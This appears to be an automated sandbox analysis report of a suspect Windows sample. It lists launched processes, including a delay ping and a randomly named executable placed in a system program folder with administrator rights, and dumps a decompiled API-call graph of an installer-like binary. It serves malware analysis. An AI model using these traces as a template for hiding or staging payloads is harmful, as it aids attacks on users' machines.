                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:21
                                                                Start time:12:35:00
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\chcp.com
                                                                Wow64 process (32bit):false
                                                                Commandline:chcp 65001
                                                                Imagebase:0x7ff724700000
                                                                File size:14'848 bytes
                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:22
                                                                Start time:12:35:01
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\PING.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:ping -n 10 localhost
                                                                Imagebase:0x7ff7758f0000
                                                                File size:22'528 bytes
                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:12:35:06
                                                                Start date:14/10/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff7fb730000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:12:35:11
                                                                Start date:14/10/2024
                                                                Path:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"
                                                                Imagebase:0xaa0000
                                                                File size:3'728'384 bytes
                                                                MD5 hash:C73DF0A231280439C24218C394E0A546
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:10.3%
                                                                  Total number of Nodes:1541
                                                                  Total number of Limit Nodes:34
                                                                  execution_graph 25483 cc62ca 123 API calls __InternalCxxFrameHandler 25533 ccb5c0 100 API calls 25534 cc77c0 118 API calls 25535 ccffc0 RaiseException _com_error::_com_error CallUnexpected 23559 ccdec2 23560 ccdecf 23559->23560 23567 cbe617 23560->23567 23568 cbe627 23567->23568 23579 cbe648 23568->23579 23571 cb4092 23602 cb4065 23571->23602 23574 ccb568 PeekMessageW 23575 ccb5bc 23574->23575 23576 ccb583 GetMessageW 23574->23576 23577 ccb5a8 TranslateMessage DispatchMessageW 23576->23577 23578 ccb599 IsDialogMessageW 23576->23578 23577->23575 23578->23575 23578->23577 23585 cbd9b0 23579->23585 23582 cbe66b LoadStringW 23583 cbe645 23582->23583 23584 cbe682 LoadStringW 23582->23584 23583->23571 23584->23583 23590 cbd8ec 23585->23590 23587 cbd9cd 23588 cbd9e2 23587->23588 23598 cbd9f0 26 API calls 23587->23598 23588->23582 23588->23583 23591 cbd904 23590->23591 23592 cbd984 _strncpy 23590->23592 23595 cbd928 23591->23595 23599 cc1da7 WideCharToMultiByte 23591->23599 23592->23587 23594 cbd959 23601 cd6159 26 API calls 3 library calls 23594->23601 23595->23594 23600 cbe5b1 50 API calls __vsnprintf 23595->23600 23598->23588 23599->23595 23600->23594 23601->23592 23603 cb407c __vswprintf_c_l 23602->23603 23606 cd5fd4 23603->23606 23609 cd4097 23606->23609 23610 cd40bf 23609->23610 23611 cd40d7 23609->23611 23633 cd91a8 20 API calls __dosmaperr 23610->23633 23611->23610 23613 cd40df 23611->23613 23635 cd4636 23613->23635 23614 cd40c4 23634 cd9087 26 API calls __cftof 23614->23634 23620 cb4086 SetDlgItemTextW 23620->23574 23621 cd4167 23644 cd49e6 51 API calls 3 library calls 23621->23644 23624 cd4172 23645 cd46b9 20 API calls _free 23624->23645 23625 cd40cf 23626 ccfbbc 23625->23626 23627 ccfbc4 23626->23627 23628 ccfbc5 IsProcessorFeaturePresent 23626->23628 23627->23620 23630 ccfc07 23628->23630 23646 ccfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23630->23646 23632 ccfcea 23632->23620 23633->23614 23634->23625 23636 cd4653 23635->23636 23642 cd40ef 23635->23642 23636->23642 23647 cd97e5 GetLastError 23636->23647 23638 cd4674 23668 cd993a 38 API calls __cftof 23638->23668 23640 cd468d 23669 cd9967 38 API calls __cftof 23640->23669 23643 cd4601 20 API calls 2 library calls 23642->23643 23643->23621 23644->23624 23645->23625 23646->23632 23648 cd97fb 23647->23648 23649 cd9807 23647->23649 23670 cdae5b 11 API calls 2 library calls 23648->23670 23671 cdb136 20 API calls 2 library calls 23649->23671 23652 cd9813 23659 cd981b 23652->23659 23678 cdaeb1 11 API calls 2 library calls 23652->23678 23653 cd9801 23653->23649 23654 cd9850 SetLastError 23653->23654 23654->23638 23657 cd9830 23657->23659 23660 cd9837 23657->23660 23658 cd9821 23661 cd985c SetLastError 23658->23661 23672 cd8dcc 23659->23672 23679 cd9649 20 API calls __dosmaperr 23660->23679 23680 cd8d24 38 API calls _abort 23661->23680 23664 cd9842 23666 cd8dcc _free 20 API calls 23664->23666 23667 cd9849 23666->23667 23667->23654 23667->23661 23668->23640 23669->23642 23670->23653 23671->23652 23673 cd8dd7 RtlFreeHeap 23672->23673 23677 cd8e00 _free 23672->23677 23674 cd8dec 23673->23674 23673->23677 23681 cd91a8 20 API calls __dosmaperr 23674->23681 23676 cd8df2 GetLastError 23676->23677 23677->23658 23678->23657 23679->23664 23681->23676 25485 cd0ada 51 API calls 2 library calls 23792 cce2d7 23794 cce1db 23792->23794 23793 cce85d ___delayLoadHelper2@8 14 API calls 23793->23794 23794->23793 23796 cce1d1 14 API calls ___delayLoadHelper2@8 25537 cda3d0 21 API calls 2 library calls 23797 cb10d5 23802 cb5abd 23797->23802 23803 cb5ac7 __EH_prolog 23802->23803 23811 cbb505 23803->23811 23805 cb5ad3 23817 cb5cac GetCurrentProcess GetProcessAffinityMask 23805->23817 23812 cbb50f __EH_prolog 23811->23812 23818 cbf1d0 82 API calls 23812->23818 23814 cbb521 23819 cbb61e 23814->23819 23818->23814 23820 cbb630 _abort 23819->23820 23823 cc10dc 23820->23823 23826 cc109e GetCurrentProcess GetProcessAffinityMask 23823->23826 23827 cbb597 23826->23827 23827->23805 25538 ce2bd0 VariantClear 25487 ccf4d3 20 API calls 25539 cbf1e8 FreeLibrary 24010 cb13e1 84 API calls 2 library calls 24011 cceae7 24012 cceaf1 24011->24012 24013 cce85d ___delayLoadHelper2@8 14 API calls 24012->24013 24014 cceafe 24013->24014 25488 ccf4e7 29 API calls _abort 24015 ccf2e0 24016 ccf2e8 24015->24016 24032 cd8b32 24016->24032 24018 ccf2f3 24039 ccef10 24018->24039 24021 ccf308 __RTC_Initialize 24023 ccf09d 29 API calls 24021->24023 24030 ccf365 24021->24030 24022 ccf38a 24024 ccf321 24023->24024 24024->24030 24045 ccfaec InitializeSListHead 24024->24045 24026 ccf337 24046 ccfb03 30 API calls 24026->24046 24028 ccf35a 24047 cd8bd2 38 API calls 3 library calls 24028->24047 24031 ccf382 24030->24031 24048 ccf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24030->24048 24033 cd8b64 24032->24033 24034 cd8b41 24032->24034 24033->24018 24034->24033 24049 cd91a8 20 API calls __dosmaperr 24034->24049 24036 cd8b54 24050 cd9087 26 API calls __cftof 24036->24050 24038 cd8b5f 24038->24018 24040 ccef1c 24039->24040 24041 ccef20 24039->24041 24040->24021 24044 ccef2d ___scrt_release_startup_lock 24041->24044 24051 ccf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24041->24051 24043 ccef96 24044->24021 24045->24026 24046->24028 24047->24030 24048->24022 24049->24036 24050->24038 24051->24043 24052 ccb7e0 24053 ccb7ea __EH_prolog 24052->24053 24220 cb1316 24053->24220 24056 ccb841 24057 ccbf0f 24292 ccd69e 24057->24292 24058 ccb82a 24058->24056 24060 ccb838 24058->24060 24061 ccb89b 24058->24061 24063 ccb83c 24060->24063 24064 ccb878 24060->24064 24067 ccb92e GetDlgItemTextW 24061->24067 24071 ccb8b1 24061->24071 24063->24056 24072 cbe617 53 API calls 24063->24072 24064->24056 24074 ccb95f KiUserCallbackDispatcher 24064->24074 24065 ccbf38 24068 ccbf41 SendDlgItemMessageW 24065->24068 24069 ccbf52 GetDlgItem SendMessageW 24065->24069 24066 ccbf2a SendMessageW 24066->24065 24067->24064 24070 ccb96b 24067->24070 24068->24069 24310 cca64d GetCurrentDirectoryW 24069->24310 24075 ccb980 GetDlgItem 24070->24075 24218 ccb974 24070->24218 24076 cbe617 53 API calls 24071->24076 24078 ccb85b 24072->24078 24074->24056 24080 ccb994 SendMessageW SendMessageW 24075->24080 24081 ccb9b7 SetFocus 24075->24081 24077 ccb8ce SetDlgItemTextW 24076->24077 24082 ccb8d9 24077->24082 24332 cb124f SHGetMalloc 24078->24332 24079 ccbf82 GetDlgItem 24085 ccbf9f 24079->24085 24086 ccbfa5 SetWindowTextW 24079->24086 24080->24081 24083 ccb9c7 24081->24083 24097 ccb9e0 24081->24097 24082->24056 24091 ccb8e6 GetMessageW 24082->24091 24087 cbe617 53 API calls 24083->24087 24085->24086 24311 ccabab GetClassNameW 24086->24311 24092 ccb9d1 24087->24092 24088 ccb862 24088->24056 24098 ccc1fc SetDlgItemTextW 24088->24098 24089 ccbe55 24093 cbe617 53 API calls 24089->24093 24091->24056 24095 ccb8fd IsDialogMessageW 24091->24095 24333 ccd4d4 24092->24333 24099 ccbe65 SetDlgItemTextW 24093->24099 24095->24082 24101 ccb90c TranslateMessage DispatchMessageW 24095->24101 24104 cbe617 53 API calls 24097->24104 24098->24056 24102 ccbe79 24099->24102 24101->24082 24107 cbe617 53 API calls 24102->24107 24106 ccba17 24104->24106 24105 ccbff0 24111 ccc020 24105->24111 24114 cbe617 53 API calls 24105->24114 24112 cb4092 _swprintf 51 API calls 24106->24112 24133 ccbe9c _wcslen 24107->24133 24108 ccb9d9 24230 cba0b1 24108->24230 24109 ccc73f 97 API calls 24109->24105 24115 ccc0d8 24111->24115 24120 ccc73f 97 API calls 24111->24120 24116 ccba29 24112->24116 24119 ccc003 SetDlgItemTextW 24114->24119 24121 ccc18b 24115->24121 24153 ccc169 24115->24153 24166 cbe617 53 API calls 24115->24166 24122 ccd4d4 16 API calls 24116->24122 24117 ccba68 GetLastError 24118 ccba73 24117->24118 24236 ccac04 SetCurrentDirectoryW 24118->24236 24125 cbe617 53 API calls 24119->24125 24127 ccc03b 24120->24127 24123 ccc19d 24121->24123 24124 ccc194 EnableWindow 24121->24124 24122->24108 24135 ccc1ba 24123->24135 24351 cb12d3 GetDlgItem EnableWindow 24123->24351 24124->24123 24128 ccc017 SetDlgItemTextW 24125->24128 24138 ccc04d 24127->24138 24163 ccc072 24127->24163 24128->24111 24129 ccba87 24136 ccba90 GetLastError 24129->24136 24137 ccba9e 24129->24137 24130 cbe617 53 API calls 24130->24056 24131 ccc0cb 24140 ccc73f 97 API calls 24131->24140 24146 cbe617 53 API calls 24133->24146 24167 ccbeed 24133->24167 24134 ccc1e1 24134->24056 24143 cbe617 53 API calls 24134->24143 24135->24134 24150 ccc1d9 SendMessageW 24135->24150 24136->24137 24141 ccbb11 24137->24141 24144 ccbaae GetTickCount 24137->24144 24145 ccbb20 24137->24145 24349 cc9ed5 32 API calls 24138->24349 24139 ccc1b0 24352 cb12d3 GetDlgItem EnableWindow 24139->24352 24140->24115 24141->24145 24147 ccbd56 24141->24147 24143->24088 24151 cb4092 _swprintf 51 API calls 24144->24151 24154 ccbcfb 24145->24154 24155 ccbb39 GetModuleFileNameW 24145->24155 24156 ccbcf1 24145->24156 24152 ccbed0 24146->24152 24252 cb12f1 GetDlgItem ShowWindow 24147->24252 24148 ccc066 24148->24163 24150->24134 24158 ccbac7 24151->24158 24159 cb4092 _swprintf 51 API calls 24152->24159 24350 cc9ed5 32 API calls 24153->24350 24162 cbe617 53 API calls 24154->24162 24343 cbf28c 82 API calls 24155->24343 24156->24064 24156->24154 24237 cb966e 24158->24237 24159->24167 24170 ccbd05 24162->24170 24163->24131 24171 ccc73f 97 API calls 24163->24171 24164 ccbd66 24253 cb12f1 GetDlgItem ShowWindow 24164->24253 24166->24115 24167->24130 24168 ccc188 24168->24121 24169 ccbb5f 24173 cb4092 _swprintf 51 API calls 24169->24173 24174 cb4092 _swprintf 51 API calls 24170->24174 24175 ccc0a0 24171->24175 24172 ccbd70 24176 cbe617 53 API calls 24172->24176 24178 ccbb81 CreateFileMappingW 24173->24178 24179 ccbd23 24174->24179 24175->24131 24180 ccc0a9 DialogBoxParamW 24175->24180 24181 ccbd7a SetDlgItemTextW 24176->24181 24183 ccbbe3 GetCommandLineW 24178->24183 24212 ccbc60 __InternalCxxFrameHandler 24178->24212 24192 cbe617 53 API calls 24179->24192 24180->24064 24180->24131 24254 cb12f1 GetDlgItem ShowWindow 24181->24254 24182 ccbaed 24186 ccbaf4 GetLastError 24182->24186 24187 ccbaff 24182->24187 24188 ccbbf4 24183->24188 24184 ccbc6b ShellExecuteExW 24209 ccbc88 24184->24209 24186->24187 24245 cb959a 24187->24245 24344 ccb425 SHGetMalloc 24188->24344 24189 ccbd8c SetDlgItemTextW GetDlgItem 24193 ccbda9 GetWindowLongW SetWindowLongW 24189->24193 24194 ccbdc1 24189->24194 24196 ccbd3d 24192->24196 24193->24194 24255 ccc73f 24194->24255 24195 ccbc10 24345 ccb425 SHGetMalloc 24195->24345 24200 ccbc1c 24346 ccb425 SHGetMalloc 24200->24346 24201 ccbccb 24201->24156 24207 ccbce1 UnmapViewOfFile CloseHandle 24201->24207 24202 ccc73f 97 API calls 24204 ccbddd 24202->24204 24280 ccda52 24204->24280 24205 ccbc28 24347 cbf3fa 82 API calls 2 library calls 24205->24347 24207->24156 24209->24201 24213 ccbcb7 Sleep 24209->24213 24211 ccbc3f MapViewOfFile 24211->24212 24212->24184 24213->24201 24213->24209 24214 ccc73f 97 API calls 24217 ccbe03 24214->24217 24215 ccbe2c 24348 cb12d3 GetDlgItem EnableWindow 24215->24348 24217->24215 24219 ccc73f 97 API calls 24217->24219 24218->24064 24218->24089 24219->24215 24221 cb1378 24220->24221 24222 cb131f 24220->24222 24354 cbe2c1 GetWindowLongW SetWindowLongW 24221->24354 24224 cb1385 24222->24224 24353 cbe2e8 62 API calls 2 library calls 24222->24353 24224->24056 24224->24057 24224->24058 24226 cb1341 24226->24224 24227 cb1354 GetDlgItem 24226->24227 24227->24224 24228 cb1364 24227->24228 24228->24224 24229 cb136a SetWindowTextW 24228->24229 24229->24224 24231 cba0bb 24230->24231 24232 cba175 24231->24232 24233 cba14c 24231->24233 24355 cba2b2 24231->24355 24232->24117 24232->24118 24233->24232 24234 cba2b2 8 API calls 24233->24234 24234->24232 24236->24129 24238 cb9678 24237->24238 24239 cb96d5 CreateFileW 24238->24239 24240 cb96c9 24238->24240 24239->24240 24241 cb971f 24240->24241 24242 cbbb03 GetCurrentDirectoryW 24240->24242 24241->24182 24243 cb9704 24242->24243 24243->24241 24244 cb9708 CreateFileW 24243->24244 24244->24241 24246 cb95be 24245->24246 24247 cb95cf 24245->24247 24246->24247 24248 cb95ca 24246->24248 24249 cb95d1 24246->24249 24247->24141 24376 cb974e 24248->24376 24381 cb9620 24249->24381 24252->24164 24253->24172 24254->24189 24256 ccc749 __EH_prolog 24255->24256 24257 ccbdcf 24256->24257 24258 ccb314 ExpandEnvironmentStringsW 24256->24258 24257->24202 24259 ccc780 _wcslen _wcsrchr 24258->24259 24259->24257 24261 ccb314 ExpandEnvironmentStringsW 24259->24261 24262 ccca67 SetWindowTextW 24259->24262 24265 cd3e3e 22 API calls 24259->24265 24267 ccc855 SetFileAttributesW 24259->24267 24272 cccc31 GetDlgItem SetWindowTextW SendMessageW 24259->24272 24275 cccc71 SendMessageW 24259->24275 24396 cc1fbb CompareStringW 24259->24396 24397 cca64d GetCurrentDirectoryW 24259->24397 24399 cba5d1 6 API calls 24259->24399 24400 cba55a FindClose 24259->24400 24401 ccb48e 76 API calls 2 library calls 24259->24401 24261->24259 24262->24259 24265->24259 24269 ccc90f GetFileAttributesW 24267->24269 24279 ccc86f _abort _wcslen 24267->24279 24269->24259 24271 ccc921 DeleteFileW 24269->24271 24271->24259 24273 ccc932 24271->24273 24272->24259 24274 cb4092 _swprintf 51 API calls 24273->24274 24276 ccc952 GetFileAttributesW 24274->24276 24275->24259 24276->24273 24277 ccc967 MoveFileW 24276->24277 24277->24259 24278 ccc97f MoveFileExW 24277->24278 24278->24259 24279->24259 24279->24269 24398 cbb991 51 API calls 2 library calls 24279->24398 24281 ccda5c __EH_prolog 24280->24281 24402 cc0659 24281->24402 24283 ccda8d 24406 cb5b3d 24283->24406 24285 ccdaab 24410 cb7b0d 24285->24410 24289 ccdafe 24426 cb7b9e 24289->24426 24291 ccbdee 24291->24214 24293 ccd6a8 24292->24293 24931 cca5c6 24293->24931 24296 ccd6b5 GetWindow 24297 ccbf15 24296->24297 24300 ccd6d5 24296->24300 24297->24065 24297->24066 24298 ccd6e2 GetClassNameW 24936 cc1fbb CompareStringW 24298->24936 24300->24297 24300->24298 24301 ccd76a GetWindow 24300->24301 24302 ccd706 GetWindowLongW 24300->24302 24301->24297 24301->24300 24302->24301 24303 ccd716 SendMessageW 24302->24303 24303->24301 24304 ccd72c GetObjectW 24303->24304 24937 cca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24304->24937 24306 ccd743 24938 cca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24306->24938 24939 cca80c 8 API calls 24306->24939 24309 ccd754 SendMessageW DeleteObject 24309->24301 24310->24079 24312 ccabcc 24311->24312 24313 ccabf1 24311->24313 24942 cc1fbb CompareStringW 24312->24942 24315 ccabff 24313->24315 24316 ccabf6 SHAutoComplete 24313->24316 24319 ccb093 24315->24319 24316->24315 24317 ccabdf 24317->24313 24318 ccabe3 FindWindowExW 24317->24318 24318->24313 24320 ccb09d __EH_prolog 24319->24320 24321 cb13dc 84 API calls 24320->24321 24322 ccb0bf 24321->24322 24943 cb1fdc 24322->24943 24325 ccb0d9 24327 cb1692 86 API calls 24325->24327 24326 ccb0eb 24328 cb19af 128 API calls 24326->24328 24329 ccb0e4 24327->24329 24331 ccb10d __InternalCxxFrameHandler ___std_exception_copy 24328->24331 24329->24105 24329->24109 24330 cb1692 86 API calls 24330->24329 24331->24330 24332->24088 24334 ccb568 5 API calls 24333->24334 24335 ccd4e0 GetDlgItem 24334->24335 24336 ccd536 SendMessageW SendMessageW 24335->24336 24337 ccd502 24335->24337 24338 ccd591 SendMessageW SendMessageW SendMessageW 24336->24338 24339 ccd572 24336->24339 24342 ccd50d ShowWindow SendMessageW SendMessageW 24337->24342 24340 ccd5c4 SendMessageW 24338->24340 24341 ccd5e7 SendMessageW 24338->24341 24339->24338 24340->24341 24341->24108 24342->24336 24343->24169 24344->24195 24345->24200 24346->24205 24347->24211 24348->24218 24349->24148 24350->24168 24351->24139 24352->24135 24353->24226 24354->24224 24356 cba2bf 24355->24356 24357 cba2e3 24356->24357 24358 cba2d6 CreateDirectoryW 24356->24358 24359 cba231 3 API calls 24357->24359 24358->24357 24360 cba316 24358->24360 24361 cba2e9 24359->24361 24363 cba325 24360->24363 24368 cba4ed 24360->24368 24362 cba329 GetLastError 24361->24362 24364 cbbb03 GetCurrentDirectoryW 24361->24364 24362->24363 24363->24231 24366 cba2ff 24364->24366 24366->24362 24367 cba303 CreateDirectoryW 24366->24367 24367->24360 24367->24362 24369 ccec50 24368->24369 24370 cba4fa SetFileAttributesW 24369->24370 24371 cba53d 24370->24371 24372 cba510 24370->24372 24371->24363 24373 cbbb03 GetCurrentDirectoryW 24372->24373 24374 cba524 24373->24374 24374->24371 24375 cba528 SetFileAttributesW 24374->24375 24375->24371 24377 cb9781 24376->24377 24378 cb9757 24376->24378 24377->24247 24378->24377 24387 cba1e0 24378->24387 24382 cb964a 24381->24382 24383 cb962c 24381->24383 24384 cb9669 24382->24384 24395 cb6bd5 76 API calls 24382->24395 24383->24382 24385 cb9638 CloseHandle 24383->24385 24384->24247 24385->24382 24388 ccec50 24387->24388 24389 cba1ed DeleteFileW 24388->24389 24390 cb977f 24389->24390 24391 cba200 24389->24391 24390->24247 24392 cbbb03 GetCurrentDirectoryW 24391->24392 24393 cba214 24392->24393 24393->24390 24394 cba218 DeleteFileW 24393->24394 24394->24390 24395->24384 24396->24259 24397->24259 24398->24279 24399->24259 24400->24259 24401->24259 24403 cc0666 _wcslen 24402->24403 24430 cb17e9 24403->24430 24405 cc067e 24405->24283 24407 cc0659 _wcslen 24406->24407 24408 cb17e9 78 API calls 24407->24408 24409 cc067e 24408->24409 24409->24285 24411 cb7b17 __EH_prolog 24410->24411 24447 cbce40 24411->24447 24413 cb7b32 24453 cceb38 24413->24453 24415 cb7b5c 24462 cc4a76 24415->24462 24418 cb7c7d 24419 cb7c87 24418->24419 24421 cb7cf1 24419->24421 24494 cba56d 24419->24494 24424 cb7d50 24421->24424 24472 cb8284 24421->24472 24422 cb7d92 24422->24289 24424->24422 24500 cb138b 74 API calls 24424->24500 24427 cb7bac 24426->24427 24429 cb7bb3 24426->24429 24428 cc2297 86 API calls 24427->24428 24428->24429 24431 cb17ff 24430->24431 24442 cb185a __InternalCxxFrameHandler 24430->24442 24432 cb1828 24431->24432 24443 cb6c36 76 API calls __vswprintf_c_l 24431->24443 24433 cb1887 24432->24433 24434 cb1847 ___std_exception_copy 24432->24434 24437 cd3e3e 22 API calls 24433->24437 24434->24442 24445 cb6ca7 75 API calls 24434->24445 24436 cb181e 24444 cb6ca7 75 API calls 24436->24444 24438 cb188e 24437->24438 24438->24442 24446 cb6ca7 75 API calls 24438->24446 24442->24405 24443->24436 24444->24432 24445->24442 24446->24442 24448 cbce4a __EH_prolog 24447->24448 24449 cceb38 8 API calls 24448->24449 24450 cbce8d 24449->24450 24451 cceb38 8 API calls 24450->24451 24452 cbceb1 24451->24452 24452->24413 24454 cceb3d ___std_exception_copy 24453->24454 24455 cceb57 24454->24455 24457 cceb59 24454->24457 24468 cd7a5e 7 API calls 2 library calls 24454->24468 24455->24415 24458 ccf5c9 24457->24458 24469 cd238d RaiseException 24457->24469 24470 cd238d RaiseException 24458->24470 24460 ccf5e6 24463 cc4a80 __EH_prolog 24462->24463 24464 cceb38 8 API calls 24463->24464 24465 cc4a9c 24464->24465 24466 cb7b8b 24465->24466 24471 cc0e46 80 API calls 24465->24471 24466->24418 24468->24454 24469->24458 24470->24460 24471->24466 24473 cb828e __EH_prolog 24472->24473 24501 cb13dc 24473->24501 24475 cb82aa 24476 cb82bb 24475->24476 24644 cb9f42 24475->24644 24479 cb82f2 24476->24479 24509 cb1a04 24476->24509 24640 cb1692 24479->24640 24482 cb8389 24528 cb8430 24482->24528 24485 cb83e8 24536 cb1f6d 24485->24536 24489 cb82ee 24489->24479 24489->24482 24492 cba56d 7 API calls 24489->24492 24648 cbc0c5 CompareStringW _wcslen 24489->24648 24490 cb83f3 24490->24479 24540 cb3b2d 24490->24540 24552 cb848e 24490->24552 24492->24489 24495 cba582 24494->24495 24496 cba5b0 24495->24496 24920 cba69b 24495->24920 24496->24419 24498 cba592 24498->24496 24499 cba597 FindClose 24498->24499 24499->24496 24500->24422 24502 cb13e1 __EH_prolog 24501->24502 24503 cbce40 8 API calls 24502->24503 24504 cb1419 24503->24504 24505 cceb38 8 API calls 24504->24505 24508 cb1474 _abort 24504->24508 24506 cb1461 24505->24506 24507 cbb505 84 API calls 24506->24507 24506->24508 24507->24508 24508->24475 24510 cb1a0e __EH_prolog 24509->24510 24516 cb1a61 24510->24516 24525 cb1b9b 24510->24525 24649 cb13ba 24510->24649 24512 cb1bc7 24661 cb138b 74 API calls 24512->24661 24515 cb3b2d 101 API calls 24518 cb1c12 24515->24518 24516->24512 24517 cb1bd4 24516->24517 24516->24525 24517->24515 24517->24525 24519 cb1c5a 24518->24519 24522 cb3b2d 101 API calls 24518->24522 24520 cb1c8d 24519->24520 24519->24525 24662 cb138b 74 API calls 24519->24662 24520->24525 24526 cb9e80 79 API calls 24520->24526 24522->24518 24523 cb3b2d 101 API calls 24524 cb1cde 24523->24524 24524->24523 24524->24525 24525->24489 24526->24524 24682 cbcf3d 24528->24682 24530 cb8440 24686 cc13d2 GetSystemTime SystemTimeToFileTime 24530->24686 24532 cb83a3 24532->24485 24533 cc1b66 24532->24533 24691 ccde6b 24533->24691 24537 cb1f72 __EH_prolog 24536->24537 24539 cb1fa6 24537->24539 24699 cb19af 24537->24699 24539->24490 24541 cb3b39 24540->24541 24542 cb3b3d 24540->24542 24541->24490 24551 cb9e80 79 API calls 24542->24551 24543 cb3b4f 24544 cb3b6a 24543->24544 24545 cb3b78 24543->24545 24546 cb3baa 24544->24546 24854 cb32f7 89 API calls 2 library calls 24544->24854 24855 cb286b 101 API calls 3 library calls 24545->24855 24546->24490 24549 cb3b76 24549->24546 24856 cb20d7 74 API calls 24549->24856 24551->24543 24553 cb8498 __EH_prolog 24552->24553 24554 cb84d5 24553->24554 24567 cb8513 24553->24567 24881 cc8c8d 103 API calls 24553->24881 24555 cb84f5 24554->24555 24559 cb857a 24554->24559 24554->24567 24557 cb84fa 24555->24557 24558 cb851c 24555->24558 24557->24567 24882 cb7a0d 152 API calls 24557->24882 24558->24567 24883 cc8c8d 103 API calls 24558->24883 24559->24567 24857 cb5d1a 24559->24857 24563 cb8605 24563->24567 24863 cb8167 24563->24863 24566 cb8797 24568 cba56d 7 API calls 24566->24568 24570 cb8802 24566->24570 24567->24490 24568->24570 24569 cbd051 82 API calls 24577 cb885d 24569->24577 24869 cb7c0d 24570->24869 24572 cb898b 24886 cb2021 74 API calls 24572->24886 24573 cb8a5f 24578 cb8ab6 24573->24578 24591 cb8a6a 24573->24591 24574 cb8992 24574->24573 24579 cb89e1 24574->24579 24577->24567 24577->24569 24577->24572 24577->24574 24884 cb8117 84 API calls 24577->24884 24885 cb2021 74 API calls 24577->24885 24586 cb8a4c 24578->24586 24889 cb7fc0 97 API calls 24578->24889 24581 cb8b14 24579->24581 24583 cba231 3 API calls 24579->24583 24579->24586 24580 cb9105 24585 cb959a 80 API calls 24580->24585 24581->24580 24600 cb8b82 24581->24600 24890 cb98bc 24581->24890 24582 cb8ab4 24587 cb959a 80 API calls 24582->24587 24588 cb8a19 24583->24588 24585->24567 24586->24581 24586->24582 24587->24567 24588->24586 24887 cb92a3 97 API calls 24588->24887 24589 cbab1a 8 API calls 24592 cb8bd1 24589->24592 24591->24582 24888 cb7db2 101 API calls 24591->24888 24595 cbab1a 8 API calls 24592->24595 24609 cb8be7 24595->24609 24598 cb8b70 24894 cb6e98 77 API calls 24598->24894 24600->24589 24601 cb8cbc 24602 cb8d18 24601->24602 24603 cb8e40 24601->24603 24604 cb8d8a 24602->24604 24605 cb8d28 24602->24605 24606 cb8e52 24603->24606 24607 cb8e66 24603->24607 24626 cb8d49 24603->24626 24614 cb8167 19 API calls 24604->24614 24610 cb8d6e 24605->24610 24618 cb8d37 24605->24618 24611 cb9215 123 API calls 24606->24611 24608 cc3377 75 API calls 24607->24608 24612 cb8e7f 24608->24612 24609->24601 24613 cb8c93 24609->24613 24620 cb981a 79 API calls 24609->24620 24610->24626 24897 cb77b8 111 API calls 24610->24897 24611->24626 24615 cc3020 123 API calls 24612->24615 24613->24601 24895 cb9a3c 82 API calls 24613->24895 24617 cb8dbd 24614->24617 24615->24626 24622 cb8de6 24617->24622 24623 cb8df5 24617->24623 24617->24626 24896 cb2021 74 API calls 24618->24896 24620->24613 24898 cb7542 85 API calls 24622->24898 24899 cb9155 93 API calls __EH_prolog 24623->24899 24632 cb8f85 24626->24632 24900 cb2021 74 API calls 24626->24900 24628 cb9090 24628->24580 24630 cba4ed 3 API calls 24628->24630 24629 cb903e 24876 cb9da2 24629->24876 24631 cb90eb 24630->24631 24631->24580 24901 cb2021 74 API calls 24631->24901 24632->24580 24632->24628 24632->24629 24875 cb9f09 SetEndOfFile 24632->24875 24635 cb9085 24637 cb9620 77 API calls 24635->24637 24637->24628 24638 cb90fb 24902 cb6dcb 76 API calls 24638->24902 24641 cb16a4 24640->24641 24918 cbcee1 86 API calls 24641->24918 24645 cb9f59 24644->24645 24646 cb9f63 24645->24646 24919 cb6d0c 78 API calls 24645->24919 24646->24476 24648->24489 24663 cb1732 24649->24663 24651 cb13d6 24652 cb9e80 24651->24652 24653 cb9ea5 24652->24653 24655 cb9e92 24652->24655 24654 cb9eb0 24653->24654 24657 cb9eb8 SetFilePointer 24653->24657 24654->24516 24655->24654 24680 cb6d5b 77 API calls 24655->24680 24657->24654 24658 cb9ed4 GetLastError 24657->24658 24658->24654 24659 cb9ede 24658->24659 24659->24654 24681 cb6d5b 77 API calls 24659->24681 24661->24525 24662->24520 24664 cb1748 24663->24664 24675 cb17a0 __InternalCxxFrameHandler 24663->24675 24665 cb1771 24664->24665 24676 cb6c36 76 API calls __vswprintf_c_l 24664->24676 24667 cb17c7 24665->24667 24672 cb178d ___std_exception_copy 24665->24672 